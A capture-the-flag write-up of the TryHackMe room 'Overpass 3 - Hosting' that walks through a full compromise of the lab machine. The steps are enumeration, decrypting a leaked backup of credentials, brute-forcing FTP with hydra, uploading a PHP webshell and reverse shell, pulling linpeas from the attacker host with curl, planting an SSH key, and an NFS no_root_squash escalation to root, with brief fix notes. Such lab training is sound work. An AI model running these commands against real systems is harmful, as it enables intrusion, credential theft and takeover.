# Initial Information

> You know them, you love them, your favourite group of broke computer science students have another business venture! Show them that they probably should hire someone for security...

> Name, link, creator: [Overpass 3 - Hosting](https://tryhackme.com/room/overpass3hosting) by [NinjaJc01](https://tryhackme.com/p/NinjaJc01); IP: 10.10.109.70

# Enumeration

As always we start with an nmap scan which reveals information
about open ports and running services on the target system.

```
$ nmap -sC -sV -p- -oN scans/tcpfull 10.10.109.70
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
|   256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
|_  256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
80/tcp open  http    Apache httpd 2.4.37 ((centos))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
|_http-title: Overpass Hosting
Service Info: OS: Unix
```

## http - 80/tcp

We can find a basic static page on port 80 with a comment in the source:

```
<!-- 0.99999% is 5 nines, right? -->
```

Since we can't find anything on the main page we must do some directory or file fuzzing.

```
$ ffuf -u http://10.10.109.70/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
backups [Status: 301, Size: 236, Words: 14, Lines: 8]
```

Going to `/backups` we can see a file listing and there is only one file `backup.zip`.
We can download it with `wget`.

```
$ wget http://10.10.109.70/backups/backup.zip
```

We can try to extract the file with `7z`.

```
$ 7z x backup.zip
```

- It successfully extracted the files from the zip without any password!

We got 2 files `CustomerDetails.xlsx.gpg` and `priv.key`. We can clearly see
the `.xlsx` file is encrypted with gpg.
Since we have the private key we can decrypt it!

First, we must import the gpg key from the zip to our gpg keyring.

```
$ gpg --import priv.key
gpg: key C9AE71AB3180BC08: public key "Paradox <paradox@overpass.thm>" imported
gpg: key C9AE71AB3180BC08: secret key imported
gpg: Total number processed: 1
gpg:               imported: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
```

Now, we can try to decrypt the `.xlsx` file.

```
$ gpg --output out --decrypt CustomerDetails.xlsx.gpg
gpg: encrypted with 2048-bit RSA key, ID 9E86A1C63FB96335, created 2020-11-08
      "Paradox <paradox@overpass.thm>"

$ file out
out: Microsoft Excel 2007+
```

- We successfully decrypted the file!

We can open it in an excel viewer for example 
[`sc-im`](https://github.com/andmarti1424/sc-im)
which is a terminal excel viewer that uses **vim keybindings**!

First, we must rename the file to the correct file format (`.xlsx`).
Then open it!

```
$ cp out out.xlsx
$ sc-im out.xlsx

0  Customer Name    Username       Password       Credit card number    CVC
1  Par. A. Doxx     paradox     SXXXXXXXXXXXXXXX3 4111 1111 4555 1142   432.00
2 0day Montgomery     0day      OXXXXXXXXXXXXXXXg 5555 3412 4444 1115   642.00
3    Muir Land   muirlandoracle AXXXXXXXXXXXXXXXe 5103 2219 1119 9245   737.00
```

- We got some **usernames and passwords** which we could try on `ftp` or `ssh`!

# Exploitation

## Making use of credentials we gathered

**users.txt:**

```
paradox
0day
muirlandoracle
```

**passwords.txt:**

```
SXXXXXXXXXXXXXXX3
OXXXXXXXXXXXXXXXg
AXXXXXXXXXXXXXXXe
```

- Note that I censored the passwords with `X` characters

### Brute forcing with hydra

We can try to use `hydra` for brute forcing!

```
$ hydra -L files/users.txt -P files/passwords.txt ssh://10.10.109.70
$ hydra -L files/users.txt -P files/passwords.txt ftp://10.10.109.70
[21][ftp] host: 10.10.109.70   login: paradox   password: SXXXXXXXXXXXXXXX3
```

- We haven't got any valid credentials for ssh but we have one pair for `ftp`!

### Getting into ftp

We can use `ftp` to connect to the server.

```
$ ftp 10.10.109.70
paradox
SXXXXXXXXXXXXXXX3

230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
```

Since we are logged in we can list the files on the share with `ls -a`.

```
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    3 48       48             94 Nov 17 23:54 .
drwxrwxrwx    3 48       48             94 Nov 17 23:54 ..
drwxr-xr-x    2 48       48             24 Nov 08 21:25 backups
-rw-r--r--    1 0        0           65591 Nov 17 20:42 hallway.jpg
-rw-r--r--    1 0        0            1770 Nov 17 20:42 index.html
-rw-r--r--    1 0        0             576 Nov 17 20:42 main.css
-rw-r--r--    1 0        0            2511 Nov 17 20:42 overpass.svg
226 Directory send OK.
```

Did you notice the `backups` directory? Yes, we can access the root of the webpage!
This means if we can upload a reverse shell
we will be able to make a get request to it from our browser and execute it
in order to get *remote code execution*.

## Getting RCE

### Uploading a webshell

We can use the `put` command in ftp to upload local files to the server.
I will upload [SecLists/Web-Shells/FuzzDB/cmd-simple.php](https://github.com/danielmiessler/SecLists/blob/master/Web-Shells/FuzzDB/cmd-simple.php).

```
$ cd /opt/SecLists/Web-Shells/FuzzDB
$ ftp 10.10.109.70
paradox
SXXXXXXXXXXXXXXX3

ftp> put cmd-simple.php
local: cmd-simple.php remote: cmd-simple.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
328 bytes sent in 0.00 secs (109.5460 kB/s)

ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    3 48       48            116 Feb 13 15:12 .
drwxrwxrwx    3 48       48            116 Feb 13 15:12 ..
drwxr-xr-x    2 48       48             24 Nov 08 21:25 backups
-rw-r--r--    1 1001     1001          328 Feb 13 15:12 cmd-simple.php
-rw-r--r--    1 0        0           65591 Nov 17 20:42 hallway.jpg
-rw-r--r--    1 0        0            1770 Nov 17 20:42 index.html
-rw-r--r--    1 0        0             576 Nov 17 20:42 main.css
-rw-r--r--    1 0        0            2511 Nov 17 20:42 overpass.svg
226 Directory send OK.
```

- We got our webshell file uploaded to the server!

We can use `curl` to test if it works as expected.

```
$ curl http://10.10.109.70/cmd-simple.php?cmd=uname
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<pre>Linux
</pre>
```

- We got `Linux` back which means our command `uname` got executed!

### Getting a reverse shell

But we must get a more accessible reverse shell.
I will use [`php-reverse-shell.php`](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php).

I just changed **line 49 and 50** according to my **ip** address and **port**
I will listen on with `nc`.

```
$ip = '10.8.2.82';  // CHANGE THIS
$port = 1337;       // CHANGE THIS
```

Then I used ftp to upload this file to the webroot.

```
ftp> put phprev.php
local: phprev.php remote: phprev.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5491 bytes sent in 0.00 secs (32.1265 MB/s)
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
---[SNIP]---
-rw-r--r--    1 1001     1001         5491 Feb 13 15:31 phprev.php
226 Directory send OK.
```

Now, we should start an **nc listener** and make a get request to our uploaded php reverse shell.

```
$ nc -lvnp 1337

$ curl http://10.10.109.70/phprev.php
```

```
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.8.2.82] from (UNKNOWN) [10.10.109.70] 49596
Linux localhost.localdomain 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
15:33:56 up  1:14,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: cannot set terminal process group (856): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4$ hostname;id
localhost.localdomain
uid=48(apache) gid=48(apache) groups=48(apache)
```

- We successfully got a reverse shell!

I used `find` to get the 1st (web) flag.

```
$ find / -name '*flag*' 2>/dev/null
/usr/share/httpd/web.flag

$ cat /usr/share/httpd/web.flag
thm{0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXd}
```

- ***We made use of a backup file on the webpage accessible by anyone containing user credentials!***
- ***Fix: Removing the backup from the fuzzable location in the webroot {and,or} setting a decent zip password***

# Privilege Escalation from apache

For first, we must **upgrade our shell to a tty** with `python`!

```
$ python3 -c 'import pty;pty.spawn("/bin/sh")'
```

We should enumerate users with shells on the box. We can use the `/etc/passwd` file for that.

```
$ grep 'bash' /etc/passwd
root:x:0:0:root:/root:/bin/bash
james:x:1000:1000:James:/home/james:/bin/bash
paradox:x:1001:1001::/home/paradox:/bin/bash
```

As always, we can try `sudo -l` but it won't work because it needs a password.

After failing with sudo we can try using privesc checker scripts like [linpeas.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
Since there is no `wget` binary on the box we must use `curl` to download it from our host or use ftp.

```
$ curl -LO 10.8.2.82:8000/linpeas.sh
$ chmod +x linpeas.sh
$ ./linpeas.sh
```

Interesting lines from linpeas:

```
[+] NFS exports?
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
```

- [book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no\_root\_squash-misconfiguration-pe](https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe)

**attacker box:**
```
$ showmount -e 10.10.109.70
clnt_create: RPC: Unable to receive
```

- Our machine can't reach the target so we must use **port forwarding** to bypass that.

Now, we can go back to our initial findings which included some user credentials.
The only user that matches is `paradox` with the password `SXXXXXXXXXXXXXXX3`.
We should try using this to log into paradox with `su`.

```
su paradox
SXXXXXXXXXXXXXXX3

hostname;id
localhost.localdomain
uid=1001(paradox) gid=1001(paradox) groups=1001(paradox)
```

- It worked! We successfully escalated our privileges to the paradox user.
- ***We made use of previously gathered information!***

# Privilege Escalation from paradox

User `paradox` has access to ssh so we can add our public key to
`/home/paradox/.ssh/authorized_keys` to be able to login through ssh
and forward the ports we need for the NFS privesc.

## Making ssh key authentication work

**On victim (paradox):**
```
$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMjNDhZW/vSZFEtwXWlTudO/wMFnw4nP8atTWR6j3OOp matesz@MLKali' >> /home/paradox/.ssh/authorized_keys
```

**On attacker:**
```
$ ssh -i ~/.ssh/id_ed25519 paradox@10.10.109.70
[paradox@localhost ~]$
```

- I successfully logged in

## Using ssh for port forwarding

- [book.hacktricks.xyz/tunneling-and-port-forwarding#ssh](https://book.hacktricks.xyz/tunneling-and-port-forwarding#ssh)

But here comes the problem: Which port is used by NFS?

We can easily get this info from `rpcinfo`.

```
$ rpcinfo -p
---[SNIP]---
100003    3   tcp   2049  nfs
100003    4   tcp   2049  nfs
100227    3   tcp   2049  nfs_acl
---[SNIP]---
```

- Our target port is `2049`!

**On attacker:**
```
$ ssh paradox@10.10.109.70 -i ~/.ssh/id_ed25519 -L 2049:localhost:2049
```

After that we can finally mount the NFS share! (note that we are still workin from our attacker box)

```
# mount -t nfs localhost:/ /mnt/tmp

# ls -la /mnt/tmp/
total 20
drwx------ 3 matesz matesz  112 Nov 17 22:15 .
drwxr-xr-x 4 root   root   4096 Oct  8 17:16 ..
lrwxrwxrwx 1 root   root      9 Nov  8 22:45 .bash_history -> /dev/null
-rw-r--r-- 1 matesz matesz   18 Nov  8  2019 .bash_logout
-rw-r--r-- 1 matesz matesz  141 Nov  8  2019 .bash_profile
-rw-r--r-- 1 matesz matesz  312 Nov  8  2019 .bashrc
drwx------ 2 matesz matesz   61 Nov  8 03:20 .ssh
-rw------- 1 matesz matesz   38 Nov 17 22:15 user.flag

cat /mnt/tmp/user.flag
thm{3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXe}

cat /mnt/tmp/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXpjtKuI5Oad0U+0H4m97s/R17/DaTRueVGGOz
7c7yuXXXXXXXXXXXXXXXXXXXXXXXXXXXXX5oiqojI+21FkFChOFgoJiNIAns7sMjm9ek63
Wn0nNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXUEE0qRwnG8HbdhpkH/HnU3Gxj/rtkZxPhT4K
o3RPYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXseMifjEajArc2eqMLi81z6FRzr6tka5D36LY
Cn9aOXXXXXXXXXXXXXXXXXXXXXXXXXXXXXfI1JK0MgMIAxo5ptReTWNQJhD1XDfg8IXcz+
0gCJZXXXXXXXXXXXXXXXXXXXXXXXXXXXXXKMbPNWXXXXXXXXXXXXXXXXXXXXXXXXXXbyvf
413NsXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAOwZSOXXXXXXXXXXXXXXXXXXXXXXXXXXO59O
qjyeMXXXXXXXXXXXXXXXXXXXXXXXXXXXXXdygYaLXXXXXXXXXXXXXXXXXXXXXXXXXX1yc2
EAAAGXXXXXXXXXXXXXXXXXXXXXXXXXXXXXFPtB+JXXXXXXXXXXXXXXXXXXXXXXXXXX1NTA
Fw72XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXZBQoThXXXXXXXXXXXXXXXXXXXXXXXXXXgvFB
/WXFmXXXXXXXXXXXXXXXXXXXXXXXXXXXXX23YaZBXXXXXXXXXXXXXXXXXXXXXXXXXXSRwM
PjWK8XXXXXXXXXXXXXXXXXXXXXXXXXXXXX3NnqjCXXXXXXXXXXXXXXXXXXXXXXXXXXba14
NT6RHzrURBdNE/Z1xIiXGX+3yNSStDIDCAMaOabUXXXXXXXXXXXXXXXXXXXXXXXXXXEXnp
pCet/ENqhQgjTx/UfgdhcyJCjGzzVuv535JJQ1p8XXXXXXXXXXXXXXXXXXXXXXXXXXajLO
dw45FshvXXXXXXXXXXXXXXXXXXXXXXXXVHRWeuBnXXXXXXXXXXXXXXXXXXXXXXXXXXdROw
rGVisNmYXXXXXXXXXXXXXXXXXXXXXXXXAAMBAAEAAAGAN1T0NSIlDF3XDZjaejh6Tc+T0A
ro/DOjkVXXXXXXXXXXXXXXXXXXXXXXXXbl5P/s6t18II4Jc7ypQ4ecDaE+uYLNiL718f+b
EQQrABOQXXXXXXXXXXXXXXXXXXXXXXXXVsiTTpvViKhznKW8K3IjpvQtaNPOYXMVKTblGb
pUYLttvjgq3WRE+pj2SGI9XQb5gGC2nXr6re0IYQprxm8L9gpM1jzd7/VghvUav8Lz2MQ7
zruJcfXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXmHrJtXDkCEGH4nEdoLKiFkcxUMM
AhFrXaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXbcknIdXXxXXXXXXXXXXXXXXXcwp
AyULB6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX5mb3K6azEXXXXXXXXXXXXXXXdmy
aHCkvmXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXsz04rhSSEXXXXXXXXXXXXXXXAAA
wFP75XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXuomvN4syJXXXXXXXXXXXXXXX9L1
fVcGl1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXTprud//l8XXXXXXXXXXXXXXXxkW
Am340sXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXlwewmJzBeXXXXXXXXXXXXXXXgVM
HAtbKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXknmYwAAAMXXXXXXXXXXXXXXXuA9
kRzRmQXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXDO95v+b4WXXXXXXXXXXXXXXXpb8
iooTuTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXgBKoRA7VZXXXXXXXXXXXXXXXrwX
kjKyFTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXxSUQiCj8MXXXXXXXXXXXXXXX9iF
8Oy3PEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXRLMnjSSI/XXXXXXXXXXXXXXXkUo
V5u9QuXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXNDIC721LfXXXXXXXXXXXXXXXEHN
FqUSrNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX4X39IKB4DfX5iI+0aZ7y3X49Z4T
bPexCHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXlX8vTYeZt1uvpvOU0VEqkHis1Uv
pF0lxEGYhnA3cAAAAbamFtZXNAbG9jYWxob3N0LmxvY2FsZG9tYWlu
-----END OPENSSH PRIVATE KEY-----
```

- We got access to the james user's **private ssh key**!
- Note that I censored the key with `X` characters

We can save it to `james.rsa.priv` and we can use it to connect to the target machine as `james` without any password!

```
$ chmod 600 files/james.rsa.priv
$ ssh -i files/james.rsa.priv james@10.10.109.70
Last login: Wed Nov 18 18:26:00 2020 from 192.168.170.145
[james@localhost ~]$ hostname;id
localhost.localdomain
uid=1000(james) gid=1000(james) groups=1000(james)
```

- We successfully escalated our privileges to the `james` user!

# Privilege Escalation from james

With the mounted nfs share we can copy a binary to the target system and make it
a root SUID from our terminal where we are root!

**On attacker:**
```
# cp /bin/bash /mnt/tmp/bash
# chmod +s /mnt/tmp/bash
```

**On victim(james):**
```
[james@localhost ~]$ /home/james/bash -p
/home/james/bash: /lib64/libtinfo.so.6: no version information available (required by /home/james/bash)
bash-5.1# hostname;id
localhost.localdomain
uid=1000(james) gid=1000(james) euid=0(root) egid=0(root) groups=0(root),1000(james)

bash-5.1# cat /root/root.flag
thm{aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX4}
```

- We successfully escalated our privileges to `root` user on the target system!
- ***By using a well-known NFS privilege escalation technique and a simple ssh port forwarding!***
- ***Fix: Fix permissions on the NFS share(no_root_squash)!***

We must NOT forget about the mounted NFS share so we will `umount` it now.

```
# umount /mnt/tmp
```
